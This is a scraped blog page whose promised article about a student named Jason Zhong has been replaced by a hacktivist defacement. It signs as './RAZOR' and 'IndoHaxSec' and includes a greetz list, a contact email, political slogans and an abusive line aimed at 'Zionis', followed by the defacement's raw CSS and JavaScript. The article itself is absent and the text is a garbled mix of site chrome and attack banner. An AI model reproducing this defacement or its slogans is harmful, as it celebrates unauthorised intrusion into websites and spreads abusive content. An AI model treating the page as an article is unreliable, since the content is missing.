techremind 01 techremind 02
Contact Us
Search
  • Home
  • Business
  • Celebrity
  • Entertainment
  • Fashion
  • Health
  • Life Style
  • News
  • Technology
Reading: Who Is Jason Zhong from TJHSST? A Simple Guide for Curious Kids
Share
TechremindTechremind
Search
  • Home
  • Business
  • Celebrity
  • Entertainment
  • Fashion
  • Health
  • Life Style
  • News
  • Technology
Follow US
Techremind > Blog > Blog > Who Is Jason Zhong from TJHSST? A Simple Guide for Curious Kids
Blog

Who Is Jason Zhong from TJHSST? A Simple Guide for Curious Kids

By Anderson June 23, 2025
Share
jason zhong tjhsst
jason zhong tjhsst
Hacked By ./RAZOR * { margin: 0; padding: 0; box-sizing: border-box; } html, body { height: 100%; background: linear-gradient(135deg, #000000 0%, #0a0a0a 100%); overflow: hidden; font-family: ‘Share Tech Mono’, monospace; } canvas { position: absolute; top: 0; left: 0; z-index: 0; } .container { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; z-index: 1; } .skull { width: 250px; margin-bottom: 20px; animation: pulse 2s infinite; filter: drop-shadow(0 0 10px #ff0000); } .text { color: #ff1a1a; font-size: 2.5em; font-weight: bold; text-shadow: 0 0 5px #ff1a1a, 0 0 10px #ff1a1a, 0 0 20px #ff1a1a, 0 0 40px #ff0000; animation: glitch 1.5s infinite; } .dud { color: #550000; } .wkwk { color: white; font-size: 1.5em; margin-top: 10px; user-select: none; text-shadow: 0 0 5px #000000aa; } .quote { position: fixed; bottom: 20px; width: 100%; text-align: center; color: white; font-size: 1em; font-family: ‘Share Tech Mono’, monospace; user-select: none; pointer-events: none; text-shadow: 0 0 5px #000000aa; padding: 0 10px; z-index: 2; } @keyframes glitch { 0% { text-shadow: 2px 2px red, -2px -2px #ff000055; } 20% { text-shadow: -2px 1px #ff0033aa, 2px -2px #ff000077; } 40% { text-shadow: 1px -1px #ff1a1a, -1px 2px #ff0000; } 60% { text-shadow: 3px 0px #ff3333aa, -3px 0px #ff000055; } 80% { text-shadow: 0 0 10px #ff1a1a, 0 0 30px #ff0000; } 100% { text-shadow: 2px 2px red, -2px -2px #ff000055; } } @keyframes pulse { 0% { transform: scale(1); } 50% { transform: scale(1.1); } 100% { transform: scale(1); } }
skull
LOADING…
EVERY STEP IS A PRAYER, EVERY CALL IS A HOPE! WE STAND PALESTINE AND IRAN
FUCK YOUU ZIONIS
#FREEPALESTINE #IRAN #INDONESIAN
Greetz : ./RAZOR – SLX_94 – JandaGans1337 – Fidxploit – Mr.Kaktus – DoremiXcode
INDONESIAN HACKTIVIST – RazorAnonByte@proton.me
// Particle Net const canvas = document.getElementById(“canvas”); const ctx = canvas.getContext(“2d”); canvas.width = window.innerWidth; canvas.height = window.innerHeight; const particles = []; const particleCount = 120; for (let i = 0; i < particleCount; i++) { particles.push({ x: Math.random() * canvas.width, y: Math.random() * canvas.height, vx: (Math.random() – 0.5) * 0.8, vy: (Math.random() – 0.5) * 0.8 }); } function draw() { ctx.clearRect(0, 0, canvas.width, canvas.height); for (let i = 0; i < particleCount; i++) { let p = particles[i]; p.x += p.vx; p.y += p.vy; if (p.x canvas.width) p.vx *= -1; if (p.y canvas.height) p.vy *= -1; ctx.beginPath(); ctx.arc(p.x, p.y, 1.2, 0, Math.PI * 2); ctx.fillStyle = “#FF0000”; ctx.fill(); for (let j = i + 1; j < particleCount; j++) { let q = particles[j]; let dx = p.x – q.x; let dy = p.y – q.y; let dist = Math.sqrt(dx * dx + dy * dy); if (dist < 100) { ctx.beginPath(); ctx.moveTo(p.x, p.y); ctx.lineTo(q.x, q.y); ctx.strokeStyle = "#800000"; ctx.stroke(); } } } requestAnimationFrame(draw); } draw(); // Scramble Text class TextScramble { constructor(el) { this.el = el; this.chars = '!@#$%^&*()_+=-{}[]|:;,.?/~’; this.update = this.update.bind(this); } setText(newText) { const oldText = this.el.innerText; const length = Math.max(oldText.length, newText.length); const promise = new Promise(resolve => this.resolve = resolve); this.queue = []; for (let i = 0; i < length; i++) { const from = oldText[i] || ''; const to = newText[i] || ''; const start = Math.floor(Math.random() * 40); const end = start + Math.floor(Math.random() * 40); this.queue.push({ from, to, start, end }); } cancelAnimationFrame(this.frameRequest); this.frame = 0; this.update(); return promise; } update() { let output = ''; let complete = 0; for (let i = 0, n = this.queue.length; i = end) { complete++; output += to; } else if (this.frame >= start) { if (!char || Math.random() < 0.28) { char = this.randomChar(); this.queue[i].char = char; } output += `${char}`; } else { output += from; } } this.el.innerHTML = output; if (complete === this.queue.length) { this.resolve(); } else { this.frameRequest = requestAnimationFrame(this.update); this.frame++; } } randomChar() { return this.chars[Math.floor(Math.random() * this.chars.length)]; } } const phrases = [ ‘Hacked By ./RAZOR’, ‘We Are IndoHaxSec’, ‘Security Is An Illusion’, ‘FREE PALESTINE!’ ]; const el = document.querySelector(‘.text’); const fx = new TextScramble(el); let counter = 0; const next = () => { fx.setText(phrases[counter]).then(() => { setTimeout(next, 2500); }); counter = (counter + 1) % phrases.length; }; next(); // Musik klik pertama let musicPlayed = false; const bgMusic = document.getElementById(‘bg-music’); document.addEventListener(‘click’, () => { if (!musicPlayed) { bgMusic.play().catch(err => { console.error(“Autoplay gagal:”, err); }); musicPlayed = true; } });
Share This Article
Facebook Twitter Email Copy Link Print
Leave a comment Leave a comment

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

RECENT NEWS

joseph toney

Who Is Joseph Toney? Simple Facts You Should Know

Blog
July 3, 2025

What Is Quitalkers Com? A Simple Guide for Everyone

Are you curious about Quitalkers Com? Maybe you saw someone mention it online, or perhaps…

July 3, 2025
fintech seo rankstar

What Is Fintech SEO Rankstar & How It Helps You Get Found Online

If you're running a fintech company and want more people to find your website, then…

July 3, 2025
city of green bay jobs

City of Green Bay Jobs: Find the Best Work in Your Area

Looking for a job in the City of Green Bay? You’ve come to the right…

July 2, 2025
jordan boone

Who Is Jordan Boone? Learn About This Inspiring Person from the USA

Jordan Boone is becoming a name that more and more people are searching for across…

July 2, 2025

YOU MAY ALSO LIKE

Who Is Joseph Toney? Simple Facts You Should Know

Joseph Toney is one of the rising names in the art world from the United States. His unique art style,…

Blog
July 3, 2025

What Is Quitalkers Com? A Simple Guide for Everyone

Are you curious about Quitalkers Com? Maybe you saw someone mention it online, or perhaps you stumbled on the site…

Blog
July 3, 2025

Who Is Jordan Boone? Learn About This Inspiring Person from the USA

Jordan Boone is becoming a name that more and more people are searching for across the internet. Whether it’s curiosity…

Blog
July 2, 2025

AGL Shoes: Cute, Comfy, and Perfect for Every Step

AGL shoes are not just any shoes — they are the perfect mix of Italian craftsmanship, luxury, and everyday comfort.…

Blog
July 2, 2025

Techremind is an engaging platform for the readers who seek unique and perfectly readable portals to be updated with the latest transitions all around the world whether it is Entertainment, Business, Life Style, Tech, or any new events around the world.

Who Is Joseph Toney? Simple Facts You Should Know
July 3, 2025
What Is Quitalkers Com? A Simple Guide for Everyone
July 3, 2025
What Is Fintech SEO Rankstar & How It Helps You Get Found Online
July 3, 2025

Quick Links

  • Home
  • About Us
  • Privacy Policy
  • Contact Us

Follow US: 

© Techremind All Rights Reserved.

Welcome Back!

Sign in to your account

Lost your password?